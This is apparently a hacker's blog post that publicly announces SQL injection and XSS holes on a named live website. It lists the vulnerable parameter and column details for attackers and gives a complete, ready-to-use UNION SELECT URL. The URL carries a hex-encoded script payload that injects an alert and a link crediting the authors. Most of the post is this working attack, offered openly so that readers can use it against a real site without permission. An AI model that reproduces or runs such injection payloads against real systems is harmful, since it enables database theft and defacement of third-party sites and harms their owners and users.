bug found at kingtamil.com

The website kingtamil.com has been found to have sqli and xss vulnerability .
the bug was found by hussain .

details for the hackers:

vulnerable url:kingtamil.com/videos.php?id=45
no of columns : 7
visible columns 2,4,3.

details for the n00bs:

check the bug of the site , by visiting the following url .
http://kingtamil.com/videos.php?id=-45%20union%20select%201,concat(0x3C,0x73,0x63,0x72,0x69,0x70,0x74,0x3E,0x61,0x6C,0x65,0x72,0x74,0x28,0x27,0x62,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x61,0x6E,0x64,0x20,0x68,0x75,0x73,0x73,0x61,0x69,0x6E,0x20,0x2D,0x2D,0x20,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x20,0x27,0x29,0x3B,0x3C,0x2F,0x73,0x63,0x72,0x69,0x70,0x74,0x3E,0x3C,0x68,0x31,0x3E,0x42,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x3C,0x61,0x20,0x68,0x72,0x65,0x66,0x3D,0x22,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x22,0x3E,0x77,0x77,0x77,0x2E,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x3C,0x2F,0x61,0x3E,0x3C,0x2F,0x68,0x31,0x3E),3,4,5,6,7;--


enjoy . R45c4l

Posted in: My Hacks, sql injection, XSS website attacks